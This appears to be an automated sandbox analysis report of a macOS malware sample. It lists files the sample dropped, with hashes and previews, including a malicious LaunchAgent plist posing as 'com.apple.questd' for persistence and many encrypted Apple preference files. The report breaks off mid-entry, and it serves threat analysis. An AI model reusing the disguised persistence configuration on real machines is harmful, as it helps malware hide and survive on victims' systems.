>2.U.v.G.J..}..C........]..A..C...q..E....A...j.F`..vsEh....uYN.r..

/Users/berri/Library/LaunchAgents/com.apple.questd.plist Download File
Process:	/Library/mixednkey/toolroomd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.144003077082375
Encrypted:	false
SSDEEP:	6:TMVBd/4o+tJCc4EyfdUdBRECcgVvZSXMMTAjeJRRDvZvEqsSAL4:TMHdgo+tJVEdQiCXF+MMkCR7tEyAU
MD5:	136F8A22DB0E3E7CAF1A0B093504B959
SHA1:	A99D2263057F96E39B5F6F8D99C03598CEBDEB92
SHA-256:	DD1FE5F48AF4AA483EEF4F3C9708BD78A9344D0BC15EDF79CB8DF729F33D55F6
SHA-512:	3FE6315E70CCB3FB90F4E3DAF468CCDB2CC6BEB5AFEC7EDCFF5158FA77008897167C7BE0DD25B2009BA2B93722E70EB4CB139E8B6F109B78E1375B836C37C3FB
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>.<key>Label</key>.<string>questd</string>..<key>ProgramArguments</key>.<array>.<string>/Users/berri/Library/AppQuest/com.apple.questd</string>.<string>--silent</string>.</array>..<key>RunAtLoad</key>.<true/>..<key>KeepAlive</key>.<true/>..</dict>.</plist>

/Users/berri/Library/Preferences/.com.apple.CallHistorySyncHelper.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.8898098718594545
Encrypted:	false
SSDEEP:	6:Uq2DtKh3BzsewLYHEec/LaqG8rQQwiQ/6:UpZKhlsewLYTc+qGm7
MD5:	D2CE143ACE928BE87559DFA0487F4C92
SHA1:	44F4FCDF403B99B4EA7E55998953E8081B7745E8
SHA-256:	867870A89864D7487E590BD937317695B8305F2E7641DA8D61C76AF983C1AEFF
SHA-512:	5998DA8B5E2DD6E57D432F79250452916FABE63F26FB39261E9E1015A0E2346B9F48E7D25BEFD01ADA2520277064C2BCA3256E77617DB207D70BE6E1449D6EAB
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a....r....\.1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.CommCenter.counts.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1186
Entropy (8bit):	7.246384465469997
Encrypted:	false
SSDEEP:	24:UfrX49l51LPxMhVH/c25fwKC36rL3SPhGsePc0m7:J9l51LZ0ZPwKFruGNpq
MD5:	FA1E5EDB51F93A74734F27CECB8E18D1
SHA1:	3903CB4608D53972A285B8CB839A39BE16178C97
SHA-256:	9A9C05FEDDABABCED7985631FD7C19A36495B35917821E285E9E51D305586EDC
SHA-512:	BFC1B960A9B143888612ACA409B981310A2DBD7654EB393BA72C4AE0DC185E555261324830DC91954248DFEA398363A532473E820CEF4CEFC396715E9CAFB33B
Malicious:	false
Preview:	...a>k...-K.Tmc..3"/E+\...........q...=...%,.@.T....x.<...g.....;t....5.X.{3.4.w..........A._\[Fh.N..N.d.!....F..@.7.3........?........T.z..HR.w.-.#..x.4.......>......[....fs._\[Fh.NI.....K.....#+~..C...r....9...%O...\..e.....;..x]...6..a~N.J..zr..<.xZr.>.\..d........A.....3..XN.>V..z..K.\|J.FD..1...].9(..KH.U......FQ........Tl.......'BNd..$k.[V..J.U292..=.`.._..y-q...y.w...[.FQ........Tl........E^...wpH8...I.v....,..].}:...q....YU.^)iE.V.P..A.~.H.o ..c...A6>.9r.....K.1..e. ..a ..."....ScU.=Gg...I.v....,..].}:...q.....m...r...dg...~.H.o ..!..7.N.Y.......$..h.]e. ..a ..."....=S.J.]...I.v....,..].}:...q...R.5.8 ..qU`T..~.H.o ..q.h{..q..0<..FQ........Tl........E8.+.....u}........h..&...@.i.........\T&...J`...x..N.2v..Z..w.e...+..u.q..q...Y...KQ.h.m\..TF...&W.0..\..r...#........u.j$...}..{6<.."a..n..Y!.TP!..YU.l.q.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s

/Users/berri/Library/Preferences/.com.apple.CoreGraphics.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.456599320918283
Encrypted:	false
SSDEEP:	6:Uq9AqKyayN0Tb6v2em7aBzsewLYHEec/LaqG8rQQwiQ/6:UyIyaeoWrm7GsewLYTc+qGm7
MD5:	DD613EAC452BD1743D65527DAC8235AD
SHA1:	218C8CEF6990231E70DF1A47DBAD585F7A74629D
SHA-256:	5072C13FD00381E3B9DC970D9555AF6F73C17DFB07B1CA9749925AB46D205203
SHA-512:	9B011B476B5FDDEC97A6E802ED7A7758F5B3525A0C1D344532ED8CDB70F02999663360B2EFC2B6231F369C545B069D5F741B11225FF1689BEA85CB043308FE85
Malicious:	false
Preview:	...a>k.......M...plZU.!..g.i...m?. .'(YR...m...w...C.yt..P.GCt......&..ec...B......T.6<.."a...V..D..{..!...%..q.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.HIToolbox.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	490
Entropy (8bit):	5.857727586965978
Encrypted:	false
SSDEEP:	6:Uqk+Jr/VfDmMWY5FGqTkmPaJLBzsewLYHEec/LaqG8rQQwiQ/6:UQxQMbY6CJBsewLYTc+qGm7
MD5:	6DA57D7203FF738A0098737F3AD79FA6
SHA1:	4E0D005213672A5189A7FE0633133BA886E831DE
SHA-256:	A4918300654BD228F5DF82B2C3B5DEA27D732757D29AE954C6C99C5ACA0F4FAF
SHA-512:	644E5C56BC30946D701E01414E3EF4470F4F62E9814528221506F60F43893FFF2B32021CE3D3BD8F448B24B99B5C6B44D6534A45EC6D28A2FA28ACEF30106F2C
Malicious:	false
Preview:	...a>k..I.(...i..O..u...).9Q^..pV...{.gu. !.L..r.......n.p......hWJ..g......;W<.0.@B.~..@.......`..z..(v.o.9.n~..%.D.6\|.U..(>.B..o,..v.9..(.;J?.C..&....F@EK6<.."a..L.^..#....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.Messages.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.889809871859455
Encrypted:	false
SSDEEP:	6:Uq2DtKhUdSBzsewLYHEec/LaqG8rQQwiQ/6:UpZKhUdOsewLYTc+qGm7
MD5:	9C8E10BB59C8EA79F178ECF121774DF3
SHA1:	D1692EB4D988FE4AE579E64CFBDECCBB3A992CAD
SHA-256:	1F908C81DC2BA44F0E72A9EBA09AA5FAEFE8D53965476892167979622D4CC927
SHA-512:	981CD72BA7739ADEAB71740885A6425BABBE97AD54D23552AC03F59E6E7DAFCCDA3F7AEE36D0944319E09C88087CDF425227874D18ECE7CDE6C13239C7E27228
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a..c/p..=...1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.PubSubAgent.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	386
Entropy (8bit):	5.1736847608335435
Encrypted:	false
SSDEEP:	6:UqOnUqrSBu7zkNkGVU8BzsewLYHEec/LaqG8rQQwiQ/6:UNSBEeDOYsewLYTc+qGm7
MD5:	9D5F11AC7C7D4F7B8D1C6F455C63C25B
SHA1:	FE71BF0D2AEB32EBAC4FB976F4735D4A96DBBA8F
SHA-256:	505E4024F355B5EB4FEE1BAE41295510CC7150425662F2D7E226B94F6EA5B6D9
SHA-512:	1827E9251F314FAB2B0F7A7A363E662DE0D75D418D7E623AFAD74DE8F413909411699E7693E641E52E8C65CEB093BD083598BE91B363270A8CDAE7389D555011
Malicious:	false
Preview:	...a>k...;..u9....(...C.w.....V\|>'..I...u..h.T....rW..t....Sq6<.."a...-aC....Q.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.appstore.commerce.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.084991137962115
Encrypted:	false
SSDEEP:	6:Uqa6AnRQH8BzsewLYHEec/LaqG8rQQwiQ/6:UKAnmHYsewLYTc+qGm7
MD5:	76572FAE47715746BAFB92FB6ED5AF99
SHA1:	B79F9068AB4DB529CC2CA03A0F6126925261D16D
SHA-256:	D4803ACBDD758615E19AB4FE37FB59C6DD34A506916DE6EB25DF861D651F1693
SHA-512:	AF48BDADC051921EDCDB548593DEE94367932C13D7D435ECFFBC5EC8AC9EAC088FCD9A4AD91CC9E7662CD0821B7636C52FB0006ABE49DB7E5AA327E259F55B0F
Malicious:	false
Preview:	...a>k.....<aG....r(.HI..........4...J?.C..&.%.F....6<.."a..e'......I.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.cloudd.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.386676574882388
Encrypted:	false
SSDEEP:	6:UqJDBNAny/jCH/aSeCBzsewLYHEec/LaqG8rQQwiQ/6:Ue1NAnUCfaR+sewLYTc+qGm7
MD5:	EBF3B7BF428BF0DA44EB03523D0045B5
SHA1:	4F4BBD9A60F8CFB8308B966896A8FD63A327B6A2
SHA-256:	A7AD9912B2F78664CB3B4AD27018E0EC29BB3F411D92AEA7A878C54CB91864FA
SHA-512:	9BC7F8B965064235035616D48E37A8231AEC45EBDEA534673470118A29142D460F55A5F6EBE289B3D761A81F50D6237A337B7C9B6D4884CEC150C3C0FECB57F4
Malicious:	false
Preview:	...a>k....AU./\|..........T..0.<Y-..jF.n@5.6S..~.H.UH=H)76c.....E.r-0;.....a(....d...W6<.."a......F.@\|.i.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.commerce.configurator.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.893327138802495
Encrypted:	false
SSDEEP:	6:Uq2DtKhEqBzsewLYHEec/LaqG8rQQwiQ/6:UpZKhEWsewLYTc+qGm7
MD5:	E9A149CE067A33266E2EDE5D61A8B56B
SHA1:	4DF2F63B3294EF25AAD169E5EDABA72B6EEDF9BA
SHA-256:	4974BA15D747EAE8A870766C740E70DF7B6C629D14F9E95B76807399428850D4
SHA-512:	72B935C030CBE004F81C9BC50C6309D5951D6514FE9F150415D806270BFE3872E345769E724963F13129E0CE21B5D4BD0CD5B422CA89C02780E2066402A63339
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a......{...1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.commerce.knownclients.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	7.570505702398013
Encrypted:	false
SSDEEP:	24:UsReRdvTIBNF3iMa+OIfG9EatZTI6cJAHSk+JwmkOPp02vNqs+nEjjWanisePc0q:CTuN1a+QT8yB+Gxgpflrtj+Npq
MD5:	D4FCF474CD949109ED1A55749D98AFC7
SHA1:	0BCADAE6AC8AA699957D1495090063153405A280
SHA-256:	D637AAAB87F38323DE25D6E76A61C0CF7DEB581641F22254B00958104B7566C6
SHA-512:	E00C7E2C474389E0A81757B95119F06EBB3D4BF4E8C3F88535BD4EF8BD6F4D2248535C9D2B36E76B0D2E88959BC76E3BD46ED771807E1C92A6290A13FA44C462
Malicious:	false
Preview:	...a>k......x............L..$6W..@..R.....a>k...S..g..8=.4.s.M.zN\|...F.......>Aht..8....c~.o5.G.0..hRp...N.}.E.d.'h..d...\|.2....<...hb. ..O.r....j....W..<6.}....Z.......,2o}...s.x..+...DG(..H..T.D.A.Z(i..C.'d(........: Y.8.@j.1.Z9g?.B......~.%^.]V..7...NW.>.......$.j..Y.+.[o....BV..K./<..@~]...>.T.....mncdz5..Y...j.JeQP...b...RQ.U.+.t..p...J...I.r.r....8$.-..n.gP.I..?...}P.....C........4o.....pV1f.}.C...p....6....&%d........(Z..h}....`q.n3.,..v...\|pSH.Q.5Y...f.Gtx...F..F$=./.-..s]..~..L..G..l....+.qg..Tca....#.3..N...m#z.0A\.(..k.fl.-.[.....C...\|....t^b@F...v].M.(J7..K..~ddC..wx2j}..{T.w..S..d._e.k..b.....R1.]H....6...H....A$xL3..v.C......G..<...O..`. ...f...E..-.VQ".J..X..v.C...#.Z.b.y$.kC.......W.. q;..C.........z.dH`/D.~...,~.2../.3..jm.....HR5y..4......=.dJ....4a<X...'w.....P.....W...C6%....L.{....>..s.Al.6.,..J.vx.~/...=....QS...kn.j.'.@2..]...\L...........Q%.[...c.7a!..@-....._`.,....UwZ.....k.i?s....<.p.\.a....m.........U.;C.g......

/Users/berri/Library/Preferences/.com.apple.commerce.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.878510436831206
Encrypted:	false
SSDEEP:	6:Uq2DtKhClBzsewLYHEec/LaqG8rQQwiQ/6:UpZKhisewLYTc+qGm7
MD5:	CB7776C4F27E46CDE0F9BBC58085B246
SHA1:	439CA1142FBEB72029C7AA4589EEF1CBF2773582
SHA-256:	30996575ADFA23B1E66A6D145D96613D9E7A2CDA26FB2235B84FC393DD29EF05
SHA-512:	6A114C9313F92F35A3F0D69EF625D5627ED9C14AE71EA03D5D8720DBAF07FDA8BCF9F5A5D4373066EF5B870580FDFE832F7CFD93E1403089B250E4305283C90C
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a....i.m.1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.configurator.ui.commerce.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.878510436831206
Encrypted:	false
SSDEEP:	6:Uq2DtKhClBzsewLYHEec/LaqG8rQQwiQ/6:UpZKhisewLYTc+qGm7
MD5:	CB7776C4F27E46CDE0F9BBC58085B246
SHA1:	439CA1142FBEB72029C7AA4589EEF1CBF2773582
SHA-256:	30996575ADFA23B1E66A6D145D96613D9E7A2CDA26FB2235B84FC393DD29EF05
SHA-512:	6A114C9313F92F35A3F0D69EF625D5627ED9C14AE71EA03D5D8720DBAF07FDA8BCF9F5A5D4373066EF5B870580FDFE832F7CFD93E1403089B250E4305283C90C
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a....i.m.1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.coreauthd.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	666
Entropy (8bit):	6.568437491604551
Encrypted:	false
SSDEEP:	12:UjmL4KmUcaBfWYhSUTLQ+2n1XtGssewLYTc+qGm7:UjXKmUcaBOE4tGssePc0m7
MD5:	961B7A4FA77797919C6CA2E25EC0F94D
SHA1:	A5B89F73F91EF4445A87047B18F78302E2C87295
SHA-256:	13330A72964E80227F7EDE3BD70F4631F83084168EB304D7F27E1B79744C637F
SHA-512:	B4C247BEF9CA9E0A153F554E0B84DA2E835758783D2C6DADF50E3310BBC58AB083E05752C2F13F79C4EC659B0D1F07A6A866A680515BE511EB0EFBB077040C2D
Malicious:	false
Preview:	...a>k....".CcY4...].....6t.C.'....}..`.U..[.P6gL..k...}.]y...:}C..%...7.Z....N...`....f.....Q..?)...!...%.kBo.f.a+/!]%.. ..).....\|S7.4x.'...\|A/..5f.e.....~.^....L(....v..'j......V..}4pVks.a..t..+.6..0.j..6.".H.....q.o.5.K.9U.j.....I....k..6...f..ow...e.p...LH.Go[......p..&l....k.Y..o....".....($.X.#76..3.SY...=....1...%.F....6<.."a....[l...i.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.coreservices.uiagent.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	554
Entropy (8bit):	6.193276964005069
Encrypted:	false
SSDEEP:	12:UlCOgmz41TutUZstI5vKGQsewLYTc+qGm7:Uzh41Tf6lGQsePc0m7
MD5:	7E687E3DB6E8091402CF33D8CB3895FC
SHA1:	DEBBCF2F2C690C726AF0B434553E5CC07D5EECEE
SHA-256:	A678C4BFE0780F61233896A1A681D704284BF0F0F2EED7D08DEE05B86D9D3C91
SHA-512:	537369A732E35697309F08D8E547DD923EE14AB64F54B5F310D453109874C4325F1226942D334669898C1077892E285FEDC899B81EB0F9760C57034022EE7F68
Malicious:	false
Preview:	...a>k...6...\.G.....O.........H......R..[..lM.!..K....K.X..yIW#....!.....\|{...YO.....iD...r...C...O~(.V8.=2...$.;.....oEx....j.....]lCb3Ji......-l...g.H].]]....x...AR'.B39..X.D.5.l].....U......-..\....w.}.O..j.....!H6<.."a..Y=..com....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.coreservices.useractivityd.dynamicuseractivites.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.895459589373579
Encrypted:	false
SSDEEP:	6:Uq2DtKhnjCqBzsewLYHEec/LaqG8rQQwiQ/6:UpZKhnjxsewLYTc+qGm7
MD5:	9F32C052D4C70E0FDD659B8DA6300196
SHA1:	F4902BD7CD2EEFE1AD325AE5F9FC961F69000BCE
SHA-256:	BE15D5B108C0B8BAAAE961332C97259F5D0CC3C0B06F42A5758F4883CD102933
SHA-512:	BFF12D6BB02644B9C4101DBDF1D7D4A52A28BBF38084048BCD5FE6B9FC3639B12E5D3FD978A3ACB7B996FA243EDEF6FE57F150B8E98DC7BE7CC97CA5239E88A3
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a..W...._.1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.corespotlightui.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.430703048636398
Encrypted:	false
SSDEEP:	6:UqErGb6ABhhp3eIX0YUawa8HVUBzsewLYHEec/LaqG8rQQwiQ/6:Ukb6AXhp3n81gsewLYTc+qGm7
MD5:	199D3D51AE2E7B60295D90C2691CD1F1
SHA1:	A7465C5D11DB14BD90A36C726164EE410E11A90A
SHA-256:	99916278F534A6E9FF08CC0514E46F3B7821EB459A512C5379E9B0178B1F13B7
SHA-512:	7344F5A390DA8D72643759DD22F8E553B145F4E01F75BAA877FB5E08ED12CD397EB5D444F934CB33F6CC69D8E2026978A1452D2D620909937EABB18AA42438F0
Malicious:	false
Preview:	...a>k...3g.R.. ..Cs...@#..8.......2~..G........\lB.T..P8....2..8..@..xd..........rW...m....L.6<.."a..F8..b.g..q.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.dock.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	18163
Entropy (8bit):	7.937221783933845
Encrypted:	false
SSDEEP:	192:uxdd9qojXFPvdRpkIB+JnHLIoAli7KyBfDBm5b0KF9IUNvvE6MveAbA2QDzbCJ:urd/1PvdMlLnxUrkUNUNA2QfA
MD5:	A922BCA0613D69032E6DF17336462CDD
SHA1:	781A3262BD022FC19694B1482B9ED47626DDA8E1
SHA-256:	F9DED78AA14AD44D316FBAB93877A1A1990DD5EBCCDDBAF1AC5DD5B4352CE16B
SHA-512:	1579116587909A7D57153B624863D7B1765233075B72A21876AC02B76E586EEB68F66CA1E9FAC938C6DC6EB7C67C44539BC106DD9745A8EFF20A8508B3A32612
Malicious:	false
Preview:	...a>k..t........].........._.A....p......l2....;/O...Y......j&..-...b8......;.........".;....p,.O......&...{Z.;6.P.........#.O.w.w..\Y.i.?..8.0[.)../.I.<6.6....//..,]C....c..2buY..l...r..a...BJr...\|.>.!..kO.....n....3..h}.v..&..8.`..b........6.~q<.=.\|.ny.#..xPHu..FY.\|=c..u2.8......^....w...C.3...u...(.....".......6<.."a..6<.."a..6<.."a.....G........$..c.0U........$....3...57...h~E.{Hq...7{;...=.e..D..o .?..N9....C)?..K.&.E.2...C)?.G...I2.....C)?.".O..Z...d....../..P.x.P.Be.Mh7..(9C.'.....U....3..\y...'}<.6<.."a..8ug......b... t.i!o..h$..;.d..4.\|...... }.q................8.mD.....D.C...+q....J..^.lQ...m.hD^..F..0.k.I$.t~.nv;.....w]....8..R`...Nf....A......+But.7..F._.6<.."a........l'.E.E...-s.......n..-.?.F..R.o.+.D..p.1$.lM.@Xp-..T...... J1.H._..=7sV./b.,.1......N/...I.iw\|Va..H.J..+.........5!.^G......}L.=.Ec.pk..X.1......Nb...zO..O%E..]Cm.]..M....8.H.....^F.}....rW...A.a..%h.*.i.$...4.iP...?..k.^,F(..gs.u. .V.......,.s.W.....

/Users/berri/Library/Preferences/.com.apple.driver.AppleBluetoothMultitouch.mouse.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	658
Entropy (8bit):	6.567102627362469
Encrypted:	false
SSDEEP:	12:ULejSTdv9J91RE4k7WKyDaHrbRVOsewLYTc+qGm7:UyUjY7WKqaH/OsePc0m7
MD5:	CFF066FFC604FBA97688302F6984B28E
SHA1:	9F721BFAE3DD4F15085360B48D1708EEA3D5E7C1
SHA-256:	4F205ABDAFC83A072B05762B9D8BA15C00A8EE6C21BF79124A0429DF66D48C69
SHA-512:	68F436F5F0BDF1BCFD6B407D2154CEED028EF47C572296F3719C3D83EB1DA560DE2F12EFD24464EF7AF3F749776E51742E9E6E603726965D42CCCD9351E70F8B
Malicious:	false
Preview:	...a>k...\|6.\|[.>r...n_.n^E.h.]m..^..&.%..).AH.W..i..k.x5....f%.<.O..X.%..U&.@......($.9.z<..v.....Su..6.,0...`.7....7=...I......... 9.)j.yXB..xu....a..`...K..j..!...-...f`.V....O......~5...>..:Y.dd...G7..zwA.j..<..O..X.%..\.ov_.).....1W.&u2.x!w..+....TN.. .dT?...........A..C.V.?2@..u...r.,....$....}.d..>.....rW...f..o....,.j....oF.&...a.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.iBooksX.commerce.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.868313712327147
Encrypted:	false
SSDEEP:	6:Uq2DtKhuotSBzsewLYHEec/LaqG8rQQwiQ/6:UpZKh1QsewLYTc+qGm7
MD5:	1ACD11E46693271A28EF3C9D517D62B0
SHA1:	F33318E6C12D4F5089643D09A48A6DB6D8EB1923
SHA-256:	9537B4709BA5EF85D776FD7E7970A1990B872EF0114144B8014D5CF38DD27311
SHA-512:	02F80A9F8B5C5394D30A853DA28F69C635FD839A34E832B5AD9660263271F93DF37038B955AA4A43BAFCAF2B2B7AFCE3864CADFD0EC8828E6EE121F13660C33F
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a......`.B..1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.madrid.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	530
Entropy (8bit):	6.073229654424735
Encrypted:	false
SSDEEP:	6:Uqcc4/BOqhZiZrqchEmAjHYwaQDlaBzsewLYHEec/LaqG8rQQwiQ/6:Ufc4ZpidDW4waMgsewLYTc+qGm7
MD5:	84A18BFA40A18D8D3AD4640F2F75223E
SHA1:	C4FA7F1443D6A22350CB04E5478C2B9B4FDC30B9
SHA-256:	0B82DB4481AE9F6EACDD6BE7BBD09A1237AEF97189C1AAD9017428ABAD34E6BB
SHA-512:	4672CADDD70F1C2351AF405AE87C8DE635A2902C03919C3E3270920CC1D8CB871D1C1793B41A9A5BA697A494913082ED552D4109C4D31D2851B88A0B9DC27468
Malicious:	false
Preview:	...a>k...=".].....-s7..K....z..cR..f..._sF....C..K.......O..\|.H^.....z.upi.{.%1..l.........eE).D..T/.)...l.T._...v+&..i.x...Ws....PO...\._.22..s...!....?.[........0tfI.fQHN.I.y.B...J?.C..&oB...'p.6<.."a...8Ct.,7...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.security.cloudkeychainproxy3.keysToRegister.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	7.076572619496426
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9Jp/rJvFbCKZNypCh82msePc0m7:yjzNrZlXZNy0rmNpq
MD5:	CF648984CEA98BDB305EEC6147CEC01F
SHA1:	D558DCF5A69E5F6C9FAF5AD525CF65BBAF4D82AF
SHA-256:	8BD0C91406F30D346597A034FF85845AA38CB89AB6382DAE56E9C640C4DBB9B8
SHA-512:	0B3AD59B06F12DDF315A43A93CC20B26008BC68FD7212F0E54EAF40C1C5A5E6B749E31C1394BE2130F6C5E820F62BF9A27FB6CCB0F6232C65F23C95843A5CAF7
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C.'.a:^.......y...D.HS...O..{N.!.1.'`...tW..n.EC..\|.?..._.{......2..}+...O;......zpu.[.....&"A..h..>h....H.{Z+.x.}...QKU..G....^.d.......(.z....J9.....hj.P..._.{......dw.p..k..X..T....59.+...`.D.N..'....ViC.m...[.$.S.....Z......O\...x......(.oL(.....\.h.tt.....^....K.a}.....V\..>.w.{K.n8...+.....I.........@...1...XI...D....9#.+.....I.........@...1 ....).Y....tK......g..9.3.+.X!3w}.".~..L=soS...=Q.K.#:....%..$.w3..e.!.y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.siri.context.service.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.492763622328868
Encrypted:	false
